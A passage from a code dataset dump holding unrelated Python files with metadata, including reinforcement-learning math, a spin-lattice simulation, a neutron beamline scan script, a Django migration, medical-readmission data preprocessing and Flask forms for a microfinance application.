sigma = tf.matrix_inverse(prec)\n term1 = -0.5 * param_eta * tf.log(tf.matrix_determinant(2 * np.pi * sigma))\n if self.beta == 1000000:\n term2 = 0.5 * param_eta * tf.log(tf.matrix_determinant(2 * np.pi * param_eta * HaaInv))\n else:\n term2 = 0.5 * (param_eta + param_omega) * tf.log(tf.matrix_determinant(2 * np.pi * (param_eta + param_omega) * HaaInv))\n\n dual = param_eta * self.epsilon - param_omega * beta + \\\n term1 + term2 + tf.reduce_mean(\n 0.5 * (tf.reduce_sum(tf.matmul(ha, HaaInv) * ha, axis=1) - hss))\n\n # Symbolic dual gradient\n dual_grad = tf.gradients(xs=[param_eta, param_omega], ys=dual)\n\n # Eval functions.\n f_dual = U.function(\n inputs=[varphis, Kt, prec, Waa, Wsa, wa] + [param_eta, param_omega, old_entropy],\n outputs=dual,\n )\n\n f_dual_grad = U.function(\n inputs=[varphis, Kt, prec, Waa, Wsa, wa] + [param_eta, param_omega, old_entropy],\n outputs=dual_grad,\n )\n\n self.opt_info = dict(\n f_dual=f_dual,\n f_dual_grad=f_dual_grad,\n )\n\n","sub_path":"baselines/copos/eta_omega_dual.py","file_name":"eta_omega_dual.py","file_ext":"py","file_size_in_byte":9884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"319012310","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nimport scipy.linalg as lg\n#import matplotlib.pyplot as plt\nfrom random import randint as rand\nfrom random import uniform as randu\n\nimport Lattice\n#interaction_type ,symmetry,boundary_type, n_column ,n_row, j_column_column,j_row_row\nclass SpinLattice2D(Lattice.SpinLattice):\n def __init__(self, settings_list ):\n self.boundary_type =settings_list[0]['general_settings']['boundary_type']\n self.interaction_type =settings_list[0]['general_settings']['interaction_type']\n self.lattice_geometry = settings_list[0]['general_settings']['lattice_geometry']\n self.quench_disorder = settings_list[0]['general_settings']['quench_disorder']\n self.symmetry = settings_list[0]['general_settings']['symmetry']\n if (self.lattice_geometry == 'square'):\n self.n_column = 
settings_list[1]['geometry_settings']['n_column']\n self.n_row = settings_list[1]['geometry_settings']['n_row']\n self.j_column_column = settings_list[1]['geometry_settings']['j_column_column']\n self.j_row_row = settings_list[1]['geometry_settings']['j_row_row']\n if self.quench_disorder == 'yes':\n self.num_quenches = settings_list[2]['quenches_settings']['num_quenches']\n self.quenches_locations = []\n for item in range(self.num_quenches):\n # 2D lattice\n q_row = settings_list[2]['quenches_settings']['quenches_locations'][item][0]\n q_column = settings_list[2]['quenches_settings']['quenches_locations'][item][1]\n q_bond = settings_list[2]['quenches_settings']['quenches_locations'][item][2]\n if q_row <= self.n_row-1 and q_column<=self.n_column and q_bond <=1: \n self.quenches_locations.append(settings_list[2]['quenches_settings']['quenches_locations'][item])\n else:\n self.quenches_locations.append([-2,-2,-2])\n # \n def num_bonds():\n if self.symmetry == 'Z2':\n if self.interaction_type == 'nn':\n if self.boundary_type == 'np':\n if self.lattice_geometry=='square':\n return (self.n_row)*(self.n_column -1) + (self.n_column) * (self.n_row-1)\n #\n def build_lattice():\n lattice = []\n if self.lattice_geometry == 'square':\n for idx_row in range(self.n_row):\n lattice.append(np.ones(self.n_column))\n return lattice\n #\n self.lattice = build_lattice()\n #\n self.num_bonds = num_bonds() \n #\n #flip_dipole the same\n #\n def get_lattice_energy(self):\n if self.lattice_geometry=='square':\n return Lattice.SpinLattice.get_lattice_energy(self)\n \n def get_local_energy_change(self, idx_column,idx_row):\n if self.quench_disorder == 'yes':\n dE = 0\n # count = 0\n j_row_row = self.j_row_row\n j_column_column = self.j_column_column \n n_column = self.n_column\n n_row = self.n_row\n switch1 = 0\n switch1row = 0\n switch1col = 0\n switch2 = 0 \n switch3 = 0 \n for quench in self.quenches_locations:\n #coincides with a disorder\n if idx_row == quench[0] and idx_column == quench[1]:\n switch1 = 1 \n if quench[2]==0:\n if switch1row != 1:\n switch1row = 1\n if quench[2]==1:\n if switch1col !=1:\n switch1col = 1\n # below to a disorder\n if idx_row-1 == quench[0] and idx_column == quench[1] and quench[2]==0:\n switch2 = 1 \n # left\n if idx_row == quench[0] and idx_column-1 == quench[1] and quench[2] == 1:\n switch3 = 1 \n #\n #\n if switch1 ==1:\n if idx_row != n_row-1:\n if switch1row == 1 :\n dE = dE + \\\n self.lattice[idx_row][idx_column].item() * \\\n self.lattice[idx_row+1][idx_column].item() *\\\n -1 * j_row_row\n else:\n dE = dE + \\\n self.lattice[idx_row][idx_column].item() * \\\n self.lattice[idx_row+1][idx_column].item() *\\\n +1 * j_row_row\n #\n if idx_column != n_column-1:\n if switch1col == 1 :\n dE = dE + \\\n self.lattice[idx_row][idx_column].item() * \\\n self.lattice[idx_row][idx_column+1].item() * \\\n -1 * j_column_column\n else:\n dE = dE + \\\n self.lattice[idx_row][idx_column].item() * \\\n self.lattice[idx_row][idx_column+1].item() * \\\n +1 * j_column_column\n else:\n if idx_row != n_row-1:\n dE = dE + \\\n self.lattice[idx_row][idx_column].item() * \\\n self.lattice[idx_row+1][idx_column].item() *\\\n +1 * j_row_row\n if idx_column != n_column-1:\n dE = dE + \\\n self.lattice[idx_row][idx_column].item() * \\\n self.lattice[idx_row][idx_column+1].item() * \\\n +1 * j_column_column\n #\n if switch2 == 1:\n if idx_row != 0:\n dE = dE + \\\n self.lattice[idx_row][idx_column].item() * \\\n self.lattice[idx_row-1][idx_column].item() *\\\n -1 * j_row_row\n else:\n dE = dE + \\\n 
self.lattice[idx_row][idx_column].item() * \\\n self.lattice[idx_row-1][idx_column].item() *\\\n +1 * j_row_row\n #\n if switch3 == 1:\n if idx_column != 0:\n dE = dE + \\\n self.lattice[idx_row][idx_column].item() * \\\n self.lattice[idx_row][idx_column-1].item() *\\\n -1 * j_column_column\n else:\n if idx_column != 0:\n dE = dE + \\\n self.lattice[idx_row][idx_column].item() * \\\n self.lattice[idx_row][idx_column-1].item() *\\\n +1 * j_column_column\n return -2*dE\n else:\n return Lattice.SpinLattice.get_local_energy_change(self, idx_column, idx_row)\n \n \n \n \n \n \n \n \n \n \n ","sub_path":"SpinLattices/Lattices/Lattice2D.py","file_name":"Lattice2D.py","file_ext":"py","file_size_in_byte":6997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"571082174","text":"print('---------------------MAXIMUM AND MINIMUM VALUE---------------------')\nnam_list = []\ncount = 0\ntotal = 0\n#use of the while loop for value being input is true\nwhile True:\n nam = input('Enter a number: ')\n if str(nam) == 'done' or str(nam) == 'DONE':\n break\n try:\n count = count + 1\n total = total + int(nam)\n nam_list += [int(nam)] #creating a list of all numbers being input\n except:\n print(\"invalid input\")\n\nmax1 = max(nam_list) #getting the maximum value from the list\nmin1 = min(nam_list) #getting the minimum value from the list\n\nprint('------------------------------------------------------------------')\nprint('Total: ', total)\nprint('Count: ', count)\nprint('List of Numbers is: ', nam_list)\nprint('Maximum number is: ', max1)\nprint('Minimum number is: ', min1)","sub_path":"src/chapter5/exercise2.py","file_name":"exercise2.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"350622620","text":"import unittest\nfrom . 
views import fibcal\n\nclass TestFibCalMethods(unittest.TestCase):\n\n\t# Test case for checking positive number\n    def test_cal(self):\n        res = fibcal(10)\n        self.assertEqual(res, 55)\n\n\t# Test case for checking negative number\n    def testNegative(self):\n        res = fibcal(-1)\n        self.assertIsNone(res)\n\nif __name__ == '__main__':\n    unittest.main()\n","sub_path":"FibCal/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"352374855","text":"#!/usr/bin/python\n\nfrom epics import caget, caput\nfrom scan import *\nimport os\nimport sys\nimport numpy as np\nfrom operator import __truediv__\nsys.path.append('/home/bl-user/Script_Test/')\nfrom CNCS_scanfunction_general_dict import *\n\nprint(\"########################################################################\")\nprint(\"#                                                                      #\")\nprint(\"#  Hello from Bl-5, CNCS is ready to collect your data                 #\")\nprint(\"#                                                                      #\")\nprint(\"########################################################################\")\n\n\nnewscan()\nresettime()\n\n#set this flag to \"1\" if you want to submit, otherwise set to \"0\" if you want to simulate\nsubmit_flag = 1\n\nif submit_flag:\n    #for now, put the choppers in Energy Phase Entry Mode\n    caput('BL5:Chop:Skf1:PhaseEntryMode', 1)\n    caput('BL5:Chop:Skf2:PhaseEntryMode', 1)\n    caput('BL5:Chop:Skf3:PhaseEntryMode', 1)\n    caput('BL5:Chop:Skf4:PhaseEntryMode', 1)\n    caput('BL5:Chop:Skf5:PhaseEntryMode', 1)\n    caput('BL5:Chop:Skf1:SpeedReq', 60.0)\n    caput('BL5:Chop:Skf2:SpeedReq', 60.0)\n    caput('BL5:Chop:Skf3:SpeedReq', 60.0)\n    caput('BL5:Chop:Skf4:SpeedReq', 60.0)\n    caput('BL5:Chop:Skf5:SpeedReq', 60.0)\n    caput('BL5:Chop:Skf45:DblDiskModeReq', 1, wait = True)\n\n\n\ntitle('V-foil white beam, Ei={0} meV 300 K'.format(3.32))\nei(3.32)\nstart()\nwaitPC(10.0)\nstop()\n\nloadconf('high_flux.sav')\n\nif submit_flag:\n    submit('quasi white beam 3.32 meV, 10C, 2hrs')\nelse:\n    simulate('quasi white beam 3.32 meV, 10C, 2hrs')\n\nestimatetime()\n","sub_path":"detector-normalization/Quasi_White_Beam_3p32meV_2hrs_10C.py","file_name":"Quasi_White_Beam_3p32meV_2hrs_10C.py","file_ext":"py","file_size_in_byte":1606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"174174096","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        ('predio', '0010_auto_20150422_1609'),\n        ('usos_suelo', '0006_auto_20150424_0402'),\n    ]\n\n    operations = [\n        migrations.CreateModel(\n            name='BosquesAreasConservacion',\n            fields=[\n                ('id', models.AutoField(serialize=False, verbose_name='ID', auto_created=True, primary_key=True)),\n                ('area_regeneracion_natural', models.IntegerField()),\n                ('area_cultivada', models.IntegerField()),\n                ('matas_monte', models.IntegerField()),\n                ('morichal', models.IntegerField()),\n                ('estereo', models.IntegerField()),\n                ('raudal', models.IntegerField()),\n                ('predio', models.ForeignKey(to='predio.InfoPredioGeneral')),\n            ],\n        ),\n        migrations.RemoveField(\n            model_name='conservacionnatural',\n            name='predio',\n        ),\n        migrations.DeleteModel(\n            name='ConservacionNatural',\n        ),\n    ]\n","sub_path":"usos_suelo/migrations/0007_auto_20150424_0434.py","file_name":"0007_auto_20150424_0434.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"118541766","text":"import 
pandas as pd\nimport numpy as np\nimport os\nimport pickle\nimport numbers\nfrom collections import Counter\nimport torch\nfrom torchtext.vocab import Vocab\n\ndef read_data(\n    data_fp, drop_duplicates=False, check=True, y_target=None, uid=None, test=0\n):\n    \"\"\"\n    Function to read-in, check and process raw 365 training or test data\n    \n    Arguments:\n    ----------\n    data_fp (str) : filepath to csv\n    drop_duplicates (bool) : drop duplicate UID (must provide uid)\n    check (bool) : check for data quality (nrows, duplicates, label ratio)\n                   must provide uid, y_target\n    y_target (str) : default None\n                     column name of label\n    uid (str) : default None\n                column name of UID of dataset (usually patient_id + discharge_id)\n    test (int) : default 0\n                 if not zero, will read in test number of rows\n    \n    Returns:\n    --------\n    data_df (dataframe) : cleaned dataframe\n    \n    \"\"\"\n    if not os.path.isfile(data_fp):\n        raise Exception(f\"Invalid data filepath: {data_fp}\")\n\n    if test:\n        data_df = pd.read_csv(data_fp, low_memory=False, nrows=test)\n    else:\n        data_df = pd.read_csv(data_fp, low_memory=False)\n    print(f\"Read data from {data_fp}\\n\")\n\n    num_dropped = 0\n    if drop_duplicates:\n        if uid not in data_df.columns:\n            raise Exception(\"Missing UID, unable to drop duplicates\")\n\n        num_dropped = data_df.shape[0]\n        data_df.drop_duplicates(uid, inplace=True)\n        num_dropped -= data_df.shape[0]\n\n    if check:\n        print(\"=\" * 20 + \"Checking data\" + \"=\" * 20 + \"\\n\")\n        print(f\"Data size: {data_df.shape}\\n\")\n\n        if drop_duplicates:\n            print(f\"Number of duplicate rows: {num_dropped}\\n\")\n\n        if (y_target is not None) and (y_target in data_df.columns):\n            print(f\"Label ratio for {y_target}\")\n            print(data_df[y_target].value_counts(normalize=True))\n\n        if (uid is not None) and (uid in data_df.columns):\n            nb_duplicates = data_df[uid].duplicated().sum()\n            print(f\"\\nDischarge_id duplicates: {nb_duplicates}\")\n\n    return data_df\n\n\ndef remove_death(data_df, y_target, x_inputs, bad_word=\"death\"):\n    \"\"\"\n    Removes any rows in data that contain unwanted words, i.e. 
death\n    in any of the x_input columns\n    \n    Arguments:\n    ----------\n    data_df (dataframe) : data to process\n    x_inputs (list) : list of input columns to consider when removing words\n    y_target (str) : column name of label \n    bad_word (str) : word used to decide which rows to remove\n    \n    Returns:\n    --------\n    data_df (dataframe) : data with rows containing unwanted words removed\n    \n    \n    \"\"\"\n    data_df_str = data_df.astype(str)\n    data_df_str[y_target] = data_df[y_target].astype(int).tolist()[:]\n\n    indices = set()\n    for input_col in x_inputs:\n        indices.update(data_df_str[data_df_str[input_col].str.contains(bad_word)].index)\n\n    print(\"\\n\" + \"=\" * 20 + \"Removing bad word data\" + \"=\" * 20 + \"\\n\")\n    print(f\"Removing bad words: {len(indices)} rows contain the word {bad_word}\")\n\n    return data_df[~data_df.index.isin(indices)]\n\ndef build_vocab(\n    data_df,\n    feat_colnames,\n    y_target=\"unplanned_readmission\",\n    min_freq=1,\n    specials=[\"<pad>\", \"<unk>\"],\n    pos_labs_vocab=True,\n):\n    \"\"\"\n    Create a vocabulary: This maps all events to an index, including \n    <pad> : index 0, sentence padding\n    <unk> : index 1, unknown events\n    nan : index 2, no events\n    \n    Arguments:\n    ----------\n    data_df (dataframe) : containing features & target\n    feat_colnames (list) : input column names to build vocab\n    y_target (str) : target column name\n    min_freq (int) : minimum frequency for vocab\n    specials (list) : special characters (padding, unknown)\n    pos_labs_vocab (bool) : to use only words from minority/pos class\n    \n    Returns:\n    --------\n    vocab (Vocab) \n    \"\"\"\n\n    def build_counter(data_df, feat_colnames):\n        counter = Counter()\n        words = data_df[feat_colnames].values.ravel(\"K\")\n        print(\"start word number: \", words.shape)\n\n        new_words = []\n\n        for x in words:\n            x = str(x)\n            x = x.replace(\"d_s\", \"d_\")\n            new_words.extend(x.replace(\" \", \"\").split(\",\"))\n\n        print(\"exact word number: \", len(new_words))\n\n        counter.update(new_words)\n\n        if not isinstance(min_freq, numbers.Number):\n            raise ValueError(f\"Something wrong with {min_freq}\")\n\n        return counter\n\n    print(\"\\n\" + \"=\" * 20 + \"Build vocabulary\" + \"=\" * 20 + \"\\n\")\n    vocab_df = data_df\n    if pos_labs_vocab:\n        vocab_df = data_df[data_df[y_target] == True]\n\n    counter = build_counter(vocab_df, feat_colnames)\n\n    vocab = Vocab(counter, min_freq=min_freq, specials=specials, specials_first=True)\n\n    print(f\"Completed vocabulary: {len(vocab)} vocabs\")\n\n    return vocab","sub_path":"model/readmission/transformer/data_proc.py","file_name":"data_proc.py","file_ext":"py","file_size_in_byte":5033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"}
{"seq_id":"178408598","text":"from wtforms import Form, TextField, PasswordField, HiddenField, ValidationError, IntegerField, DateField\r\nfrom wtforms import validators as v\r\nfrom wtforms import SelectMultipleField, Form\r\nfrom flask_login import current_user\r\nfrom flask.ext.sauth.models import User, authenticate\r\nfrom e_organisation.models import *\r\n\r\n\r\nclass AddOrganisationForm( Form):\r\n    org_name =TextField( validators=[v.DataRequired(), v.Length(max=255)])\r\n    branches =TextField()\r\n    states =TextField( )\r\n    areas =TextField( )\r\n    regions =TextField( )\r\n    postal_address =TextField( validators=[v.DataRequired(), v.Length(max=100)])\r\n    postal_telephone =TextField( validators=[v.DataRequired(), v.Length(max=20)])\r\n    postal_tele_code =TextField( validators=[v.DataRequired(), v.Length(max=5)])\r\n    postal_code =TextField( validators=[v.DataRequired(), v.Length(max=10)])\r\n    
postal_country =TextField( validators=[v.DataRequired(), v.Length(max=100)])\n postal_state =TextField( validators=[v.DataRequired(), v.Length(max=100)])\n postal_city =TextField( validators=[v.DataRequired(), v.Length(max=100)])\n email =TextField( validators=[v.DataRequired(), v.Email(), v.Length(max=256), v.Email()])\n\n def validate_org_name(form, field):\n org_name = field.data.lower().strip()\n if EsthenosOrg.objects(name=org_name).count():\n raise ValidationError(\"Hey! This organisation is already registered with us\")\n\n def save(self):\n org = EsthenosOrg(name=self.org_name.data)\n org.postal_address =self.postal_address.data\n org.postal_telephone =self.postal_telephone.data\n org.postal_tele_code =self.postal_tele_code.data\n org.postal_country =self.postal_country.data\n org.postal_state =self.postal_state.data\n org.postal_city =self.postal_city.data\n org.postal_code = self.postal_code.data\n org.email = self.email.data\n org.admins.append(EsthenosUser.objects.get(id=current_user.id))\n\n org.save()\n return org\n\n\nclass RegistrationFormAdmin( Form):\n type = HiddenField()\n name = TextField( validators=[v.DataRequired(), v.Length(max=256)])\n email = TextField( validators=[v.DataRequired(), v.Email(), v.Length(max=256)])\n password = PasswordField( validators=[v.DataRequired(), v.Length(max=256)])\n\n def validate_email(form, field):\n email = field.data.lower().strip()\n if EsthenosUser.objects(email=email).count():\n raise ValidationError( \"Hey! This email is already registered with us. Did you forget your password?\")\n\n def save(self):\n user = EsthenosUser.create_user( self.name.data, self.email.data, self.password.data, email_verified=True)\n user.save()\n return user\n\n\nclass AddOrganizationEmployeeForm(Form):\n last_name_add_organisation = TextField( validators=[v.DataRequired(), v.Length(max=255)])\n first_name_add_organisation = TextField( validators=[v.DataRequired(), v.Length(max=255)])\n id_add_organisation = TextField( validators=[v.DataRequired(), v.Length(max=255)])\n valid_email_add_organisation = TextField( validators=[v.DataRequired(), v.Email(), v.Length(max=256)])\n active = TextField( validators=[v.Length(max=255)])\n gender = TextField( validators=[v.DataRequired(), v.Length(max=255)])\n date_of_joining = TextField( validators=[v.DataRequired(), v.Length(max=255)])\n\n email_add_organisation = TextField( validators=[v.DataRequired(), v.Email(), v.Length(max=256)])\n password_add_organisation = PasswordField(validators=[v.DataRequired(), v.Length(max=30)])\n\n role = TextField( validators=[v.DataRequired(), v.Length(max=255)])\n\n address_add_org_emp = TextField( validators=[v.DataRequired(), v.Length(max=255)])\n city_add_organisation = TextField( validators=[v.DataRequired(), v.Length(max=255)])\n state_add_organisation = TextField( validators=[v.DataRequired(), v.Length(max=255)])\n country_add_organisation = TextField( validators=[v.DataRequired(), v.Length(max=255)])\n teleno_add_organisation = TextField( validators=[v.DataRequired(), v.Length(max=255)])\n tele_code_add_organisation = TextField( validators=[v.DataRequired(), v.Length(max=255)])\n postal_code_add_organisation = TextField( validators=[v.DataRequired(), v.Length(max=255)])\n\n states = SelectMultipleField('states')\n regions = SelectMultipleField('regions')\n areas = SelectMultipleField('areas')\n branches = SelectMultipleField('branches')\n centers = SelectMultipleField('centers')\n\n def validate_email_add_organisation(form, field):\n email_add_organisation = 
field.data.lower().strip()\n if EsthenosUser.objects(email=email_add_organisation).count():\n raise ValidationError( \"Hey! This email is already registered with us. Did you forget your password?\")\n\n def save(self, org_id):\n emp = EsthenosUser.create_user(self.first_name_add_organisation.data,\n self.email_add_organisation.data,\n self.password_add_organisation.data)\n\n emp.last_name = self.last_name_add_organisation.data\n emp.first_name = self.first_name_add_organisation.data\n\n emp.usr_id = self.id_add_organisation.data\n emp.notify_email = self.valid_email_add_organisation.data\n\n emp.email = self.email_add_organisation.data\n emp.gender = self.gender.data\n emp.active = False\n\n emp.date_of_birth = self.date_of_joining.data\n emp.postal_address = self.address_add_org_emp.data\n emp.postal_code = self.postal_code_add_organisation.data\n emp.postal_city = self.city_add_organisation.data\n emp.postal_state = self.state_add_organisation.data\n emp.postal_country = self.country_add_organisation.data\n emp.postal_telephone = self.teleno_add_organisation.data\n emp.postal_tele_code = self.tele_code_add_organisation.data\n\n emp.hierarchy = EsthenosOrgHierarchy.objects.get(id=self.role.data)\n emp.organisation = EsthenosOrg.objects.get(id=org_id)\n emp.save()\n\n org = EsthenosOrg.objects.get(id=org_id)\n org.update(inc__employee_count=1)\n return emp\n\n #def deselect_employee_geo(self, emp):\n # emp.access_states = []\n # emp.access_regions = []\n # emp.access_areas = []\n # emp.access_centers = []\n # emp.save()\n\n def update(self, emp):\n errors = {}\n emp.last_name = self.last_name_add_organisation.data\n emp.first_name = self.first_name_add_organisation.data\n emp.usr_id = self.id_add_organisation.data\n emp.notify_email = self.valid_email_add_organisation.data\n\n emp.gender = self.gender.data\n emp.active = True if self.active.data == \"active\" else False\n\n emp.date_of_birth = self.date_of_joining.data\n emp.postal_address = self.address_add_org_emp.data\n emp.postal_code = self.postal_code_add_organisation.data\n emp.postal_city = self.city_add_organisation.data\n emp.postal_state = self.state_add_organisation.data\n emp.postal_country = self.country_add_organisation.data\n emp.postal_telephone = self.teleno_add_organisation.data\n emp.postal_tele_code = self.tele_code_add_organisation.data\n\n emp.save()\n if self.role.data != '':\n emp.hierarchy = EsthenosOrgHierarchy.objects.get(id=self.role.data)\n\n to_save = True\n\n selections = []\n #self.deselect_employee_geo(emp)\n #todo centralize the level assignments\n if emp.hierarchy.level == 3:\n for state in self.states.data:\n state = EsthenosOrgState.objects.get(id=state)\n regions = map(lambda r: str(r.id), state.regions)\n commons = set.intersection(set(regions), self.regions.data)\n if not len(commons) and state.owner == None:\n state.owner = emp\n state.save()\n selections.append(state)\n elif state.owner!=None:\n errors[\"states\"] = \"A selected state has already been assigned.\"\n if len(selections)<1:\n to_save = False\n errors[\"not_selected\"] = \"The employee needs to be assigned a state.\"\n if len(selections) != 0:\n emp.access_states = selections\n\n selections = []\n #todo centralize the level assignments\n if emp.hierarchy.level == 4:\n for region in self.regions.data:\n region = EsthenosOrgRegion.objects.get(id=region)\n areas = map(lambda r: str(r.id), region.areas)\n commons = set.intersection(set(areas), self.areas.data)\n if not len(commons) and region.owner == None:\n region.owner = emp\n 
region.save()\n selections.append(region)\n elif region.owner!=None:\n errors[\"regions\"] = \"A selected region has already been assigned\"\n if len(selections)<1:\n to_save = False\n errors[\"not_selected\"] = \"The employee needs to be assigned a region.\"\n if len(selections) != 0:\n emp.access_regions = selections\n\n selections = []\n #todo centralize the level assignments\n if emp.hierarchy.level == 5:\n for area in self.areas.data:\n area = EsthenosOrgArea.objects.get(id=area)\n branches = map(lambda r: str(r.id), area.branches)\n commons = set.intersection(set(branches), self.branches.data)\n if not len(commons) and area.owner == None:\n area.owner = emp\n area.save()\n selections.append(area)\n elif area.owner!=None:\n errors[\"areas\"] = \"A selected area has already been assigned.\"\n if len(selections)<1:\n to_save = False\n errors[\"not_selected\"] = \"The employee needs to be assigned an area.\"\n if len(selections) != 0:\n emp.access_areas = selections\n\n selections = []\n #todo centralize the level assignments\n if emp.hierarchy.level >= 6:\n for branch in self.branches.data:\n branch = EsthenosOrgBranch.objects.get(id=branch)\n centers = map(lambda r: str(r.id), branch.centers)\n commons = set.intersection(set(centers), self.centers.data)\n if not len(commons):\n if emp.hierarchy.level == 6 and branch.owner == None:\n branch.owner = emp\n branch.save()\n selections.append(branch)\n elif emp.hierarchy.level == 6 and branch.owner!=None:\n errors[\"branches\"] = \"A selected branch has already been assigned.\"\n if emp.hierarchy.level == 7:\n if branch.owner == emp:\n branch.owner = None\n branch.save()\n selections.append(branch)\n if len(selections)<1:\n to_save = False\n errors[\"not_selected\"] = \"The employee needs to be assigned a branch.\"\n\n if len(selections) != 0:\n emp.access_branches = selections\n\n selections = []\n #todo centralize the level assignments\n if emp.hierarchy.level == 7:\n for center in self.centers.data:\n selections.append(EsthenosOrgCenter.objects.get(id=center))\n if len(selections) != 0:\n emp.access_centers = selections\n\n if len(emp.branches)>1 and emp.hierarchy.level == 7:\n to_save = False\n errors[\"not_selected\"] = \"The employee can only be assigned a single branch.\"\n\n if to_save:\n emp.save()\n return emp, errors\n\n\nclass AddOrganisationProductForm( Form):\n product_name=TextField( validators=[v.Length(max=255)])\n\n loan_type=TextField( validators=[v.Length(max=255)])\n loan_amount=TextField( validators=[ v.Length(max=255)])\n loan_tenure=TextField( validators=[ v.Length(max=255)])\n\n life_insurance=TextField( validators=[ v.Length(max=255)])\n eligible_cycle=TextField( validators=[ v.Length(max=255)])\n number_installments=TextField( validators=[ v.Length(max=255)])\n\n emi=TextField( validators=[ v.Length(max=255)])\n emi_repayment=TextField( validators=[ v.Length(max=255)])\n last_emi=TextField( validators=[ v.Length(max=255)])\n\n service_tax=TextField( validators=[ v.Length(max=255)])\n interest_rate=TextField( validators=[ v.Length(max=255)])\n\n processing_fee=TextField( validators=[ v.Length(max=255)])\n total_processing_fees=TextField( validators=[ v.Length(max=255)])\n\n insurance_service_tax=TextField( validators=[ v.Length(max=255)])\n insurance_period=TextField( validators=[ v.Length(max=255)])\n insurance_free=TextField( validators=[ v.Length(max=255)])\n total_insurance_fees=TextField( validators=[ v.Length(max=255)])\n\n group_min=IntegerField( validators=[v.DataRequired()] )\n group_max=IntegerField( 
validators=[v.DataRequired()] )\n\n # def validate_product_name(form,field):\n #\n # product_name =field.data.strip()\n # cnt = EsthenosOrgProduct.objects.filter(product_name=product_name).count()\n # if cnt:\n # raise ValidationError( \"Hey! This product is already registered with us\")\n\n def validate(self):\n if self.group_min.data <= self.group_max.data:\n return True\n\n def save(self, org, product=None):\n if product:\n prod = product\n else:\n prod=EsthenosOrgProduct(product_name=self.product_name.data)\n prod.loan_amount=float(self.loan_amount.data)\n prod.loan_type = self.loan_type.data\n prod.life_insurance=float(self.life_insurance.data)\n prod.eligible_cycle=int(self.eligible_cycle.data)\n prod.number_installments=int(self.number_installments.data)\n prod.emi=float(self.emi.data)\n prod.service_tax=float(self.service_tax.data)\n prod.insurance_service_tax=float(self.insurance_service_tax.data)\n prod.last_emi=float(self.last_emi.data)\n prod.processing_fee=float(self.processing_fee.data)\n prod.total_processing_fees=float(self.total_processing_fees.data)\n prod.interest_rate=float(self.interest_rate.data)\n prod.insurance_free=float(self.insurance_free.data)\n prod.insurance_period=float(self.insurance_period.data)\n prod.total_insurance_fees=float(self.total_insurance_fees.data)\n prod.emi_repayment=self.emi_repayment.data\n prod.loan_tenure=float(self.loan_tenure.data)\n prod.organisation=org\n prod.group_max=self.group_max.data\n prod.group_min=self.group_min.data\n prod.save()\n return prod\n\n\nclass AddOrgGRTTemplateQuestionsForm( Form):\n question = TextField( validators=[v.Length(max=2048)])\n question_hindi = TextField( validators=[v.Length(max=2048)])\n org_id = TextField( validators=[ v.Length(max=255)])\n\n def save( self):\n ques=EsthenosOrgGRTTemplateQuestion()\n ques.question=self.question.data\n ques.question_regional = self.question_hindi.data\n ques.organisation=EsthenosOrg.objects.get(id=self.org_id.data)\n ques.save()\n return ques\n\n\nclass AddOrgCGT1TemplateQuestionsForm( Form):\n question = TextField( validators=[v.Length(max=2048)])\n question_hindi = TextField( validators=[v.Length(max=2048)])\n org_id = TextField( validators=[ v.Length(max=255)])\n\n def save( self):\n ques=EsthenosOrgCGT1TemplateQuestion()\n ques.question=self.question.data\n ques.question_regional = self.question_hindi.data\n ques.organisation=EsthenosOrg.objects.get(id=self.org_id.data)\n ques.save()\n return ques\n\n\nclass AddOrgCGT2TemplateQuestionsForm( Form):\n question = TextField( validators=[v.Length(max=2048)])\n question_hindi = TextField( validators=[v.Length(max=2048)])\n org_id = TextField( validators=[ v.Length(max=255)])\n\n def save( self):\n ques=EsthenosOrgCGT2TemplateQuestion()\n ques.question=self.question.data\n ques.question_regional = self.question_hindi.data\n ques.organisation=EsthenosOrg.objects.get(id=self.org_id.data)\n ques.save()\n return ques\n\n\nclass AddOrgTeleCallingTemplateQuestionsForm( Form):\n org_id = TextField( validators=[v.DataRequired(), v.Length(max=255)])\n question = TextField( validators=[v.DataRequired(), v.Length(max=2048)])\n question_hindi = TextField( validators=[v.DataRequired(), v.Length(max=2048)])\n\n def save( self):\n ques=EsthenosOrgTeleCallingTemplateQuestion()\n ques.question=self.question.data\n ques.question_regional = self.question_hindi.data\n ques.organisation=EsthenosOrg.objects.get(id=self.org_id.data)\n ques.save()\n return 
ques\n","sub_path":"e_admin/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":17059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"466442585","text":"import os\n\n\nDEBUG = True\nPORT = 9192\n\nEXECUTORS = ['python.PythonExecutor', 'spark.SparkExecutor']\nDEFAULT_EXECUTOR = 'spark.SparkExecutor'\n\n# Location of Spark home, where we can find PySpark.\nSPARK_HOME = os.environ.get('SPARK_HOME', '/scratch/spark-1.0.0')\n# Host name of the master node of your Spark cluster.\nSPARK_MASTER = 'local'\n","sub_path":"metis/tests/conf/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"148203802","text":"import torch as torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nimport pdb\n\n\nclass SimpleAttention(nn.Module):\n def __init__(self, hidden_size):\n super(SimpleAttention, self).__init__()\n\n self.W_d = nn.Linear(hidden_size, hidden_size, bias=True)\n\n self.W_e = nn.Linear(hidden_size * 2, hidden_size, bias=True)\n\n self.v = nn.Linear(hidden_size, 1, bias=True)\n\n def forward(self, h_d, h_e, mask):\n batch_size, seq_len, _ = 